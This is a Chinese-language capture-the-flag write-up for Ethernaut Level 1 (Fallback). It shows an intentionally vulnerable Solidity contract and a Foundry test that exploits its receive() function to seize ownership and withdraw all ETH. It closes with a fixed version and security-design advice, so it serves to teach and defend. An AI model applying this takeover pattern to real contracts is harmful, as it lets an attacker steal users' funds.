Ethernaut Level 1: Fallback - 回退函数权限提升攻击
🎯 Ethernaut Level 1: Fallback - 回退函数权限提升攻击
关卡链接: Ethernaut Level 1 - Fallback
攻击类型: 权限提升、Fallback 函数漏洞
难度: ⭐⭐☆☆☆
📋 挑战目标
这是 Ethernaut 系列的第一个正式关卡,目标非常明确:
- 获取合约控制权 - 成为合约的
owner
- 转出所有余额 - 提取合约中的所有 ETH
🔍 漏洞分析
合约源码分析
首先,我们来分析目标合约的关键代码:
contract Fallback {mapping(address => uint) public contributions;address public owner;constructor() {owner = msg.sender;contributions[msg.sender] = 1000 * (1 ether);}modifier onlyOwner {require(msg.sender == owner, "caller is not the owner");_;}function contribute() public payable {require(msg.value < 0.001 ether);contributions[msg.sender] += msg.value;if(contributions[msg.sender] > contributions[owner]) {owner = msg.sender;}}function getContribution() public view returns (uint) {return contributions[msg.sender];}function withdraw() public onlyOwner {payable(owner).transfer(address(this).balance);}// 🚨 关键漏洞点receive() external payable {require(msg.value > 0 && contributions[msg.sender] > 0);owner = msg.sender;}function getOwner() public view returns (address) {return owner;}
}
漏洞识别
通过代码审计,我们发现了两种成为 owner
的方式:
方式一:通过 contribute()
函数
- 需要贡献超过 1000 ETH 才能获得控制权
- 每次调用限制最多 0.001 ETH
- 需要调用超过 100 万次,成本过高 ❌
方式二:通过 receive()
函数 ⭐
- 只需满足两个简单条件:
msg.value > 0
- 发送任意数量的 ETHcontributions[msg.sender] > 0
- 之前有过贡献记录
- 满足条件后直接成为
owner
✅
攻击路径
- 建立贡献记录 - 调用
contribute()
发送少量 ETH - 触发权限提升 - 直接向合约发送 ETH 触发
receive()
- 提取资金 - 调用
withdraw()
提取所有余额
💻 Foundry 实现
攻击合约代码
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;import "forge-std/Test.sol";
import "../src/Fallback.sol";contract FallbackTest is Test {Fallback public instance;address public attacker = makeAddr("attacker");function setUp() public {// 部署目标合约instance = new Fallback();// 给攻击者一些初始资金vm.deal(attacker, 1 ether);// 给合约一些初始余额vm.deal(address(instance), 1 ether);}function testFallbackExploit() public {vm.startPrank(attacker);// 步骤1: 先贡献少量ETH以满足contributions[msg.sender] > 0instance.contribute{value: 0.0001 ether}();// 验证贡献记录assertGt(instance.getContribution(), 0);// 步骤2: 直接向合约发送ETH触发receive()函数(bool sent, ) = address(instance).call{value: 1 wei}("");require(sent, "Failed to send Ether to the Fallback");// 验证已成为ownerassertEq(instance.getOwner(), attacker);// 步骤3: 提取所有资金uint256 initialBalance = attacker.balance;instance.withdraw();// 验证资金提取成功assertGt(attacker.balance, initialBalance);assertEq(address(instance).balance, 0);vm.stopPrank();}
}
运行测试
# 运行 Fallback 关卡测试
forge test --match-contract FallbackTest -vvv# 输出应该显示所有断言通过
🛡️ 防御措施
问题根源
- 权限检查不当 -
receive()
函数中没有适当的权限验证 - 逻辑设计缺陷 - 允许通过简单条件获得完整控制权
- 函数职责混乱 - 接收资金的函数不应包含权限变更逻辑
安全修复建议
contract SecureFallback {mapping(address => uint) public contributions;address public owner;constructor() {owner = msg.sender;contributions[msg.sender] = 1000 * (1 ether);}modifier onlyOwner {require(msg.sender == owner, "caller is not the owner");_;}function contribute() public payable {require(msg.value < 0.001 ether);contributions[msg.sender] += msg.value;// ✅ 提高门槛,避免简单的权限提升if(contributions[msg.sender] > contributions[owner] && contributions[msg.sender] > 10 ether) {owner = msg.sender;}}// ✅ 移除权限变更逻辑,只处理资金接收receive() external payable {// 仅记录接收的资金,不修改权限emit FundsReceived(msg.sender, msg.value);}function withdraw() public onlyOwner {payable(owner).transfer(address(this).balance);}event FundsReceived(address sender, uint amount);
}
📚 核心知识点
1. Fallback 和 Receive 函数
// receive() - 接收纯ETH转账时调用
receive() external payable {// 处理逻辑
}// fallback() - 调用不存在的函数或带数据的ETH转账时调用
fallback() external payable {// 处理逻辑
}
2. 权限设计原则
- 最小权限原则 - 给予最少必要的权限
- 权限分离 - 不同功能使用不同权限级别
- 权限检查 - 在关键操作前进行充分验证
3. 安全开发最佳实践
- 避免在特殊函数中实现关键逻辑
- 使用 OpenZeppelin 的 Ownable 模式
- 充分的单元测试覆盖
- 代码审计和同行评审
🎯 总结
Fallback 关卡虽然简单,但展示了智能合约安全的基础概念:
- ✅ 函数职责分离的重要性
- ✅ 权限验证的必要性
- ✅ 特殊函数的使用注意事项
- ✅ Foundry 测试框架的基本使用
这是学习智能合约安全的良好起点,为后续更复杂的攻击技术打下基础。
🔗 相关链接
- 原文: Ethernaut Foundry Solutions
- GitHub 项目
在智能合约的世界中,最简单的漏洞往往隐藏着最深刻的安全教训。 🎓